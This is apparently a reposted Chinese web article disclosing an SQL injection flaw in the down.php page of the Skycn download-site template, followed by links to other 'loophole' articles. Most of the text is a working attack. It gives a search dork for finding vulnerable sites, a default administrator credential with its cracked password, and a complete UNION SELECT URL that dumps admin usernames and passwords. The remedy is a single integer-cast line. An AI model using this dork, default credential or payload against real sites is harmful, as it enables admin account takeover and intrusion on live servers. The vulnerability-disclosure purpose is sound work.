天空下载站(skycn)程序存在SQL注入漏洞及最新解决方案
天空下载站是国内著名的下载站点,提供国内外最新免费软件、共享软件下载。其在全国各地铁通、联通、电信、信息港等都建有以php+MySql架设的下载分站,相当一部分下载分站的建站程序采用同一套建站模板,而这套建站模板存在SQL注入漏洞。
关键词:inurl:down.php
漏洞文件:down.php
down.php中没有对get变量$id做任何过滤措施,导致攻击者可以任意使用SQL注入语句进行攻击,通过测试发现,多数管理员登陆口令默认密码并未修改,默认管理员信息为1111_7363a304be1a682efaf10702fc7b97d8,解密密码hash可知默认密码为sky!@#cn!
注入利用:
keyword:Copyrightcopy;1998 - 2007 Skycn.com All Rights Reserved inurl:down.php
http://site.com/down.php?id=1+union+select+column_numbers+from+table_name
column_numbers:不固定,通常为50+,也有少于40,例如临沂信息港测试为38个显示位
table_name:管理员表段名为master,字段名为username,password
在字段2软件标题显示位填写concat(username,0x5f,password)即可爆出管理员登陆口令
SQL EXP:
http://download.site.com/down.php?id=47488+and+1=2+union+select+1,concat(username,0x5f,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+master
安全提示:
解决方法:$id=(int)$_GET['id'];
相关阅读
- 支付宝AR抢红包最新漏洞 支付宝AR抢红包漏洞领取方法详解
- 支付宝出现重大漏洞 支付宝重大漏洞是真是假?
- 支付宝怎么避开漏洞侵扰 支付宝安全保护方法介绍
- 支付宝怎么防止熟人登陆漏洞bug 支付宝熟人不需要密码登陆bug是怎么回事
- 支付宝漏洞出现是真的吗 支付宝熟人能登录你的支付宝吗
- 微信小程序存在漏洞吗 微信小程序会堵上那些app漏洞吗
- 摩拜单车充1送110会要求退款吗 摩拜单车出现漏洞详情介绍
- ofo躺在家里怎么抢红包 ofo抢红包漏洞
- 微信XSS漏洞怎么玩 微信远程弹窗漏洞怎么不能用了
- 滴滴支付出现漏洞怎么回事 滴滴支付现漏洞解决方法
《天空下载站(skycn)程序存在SQL注入漏洞及最新解决方案》由网友“不缺我”推荐。
转载请注明:http://www.modouwifi.com/jiaocheng/052010O0H021.html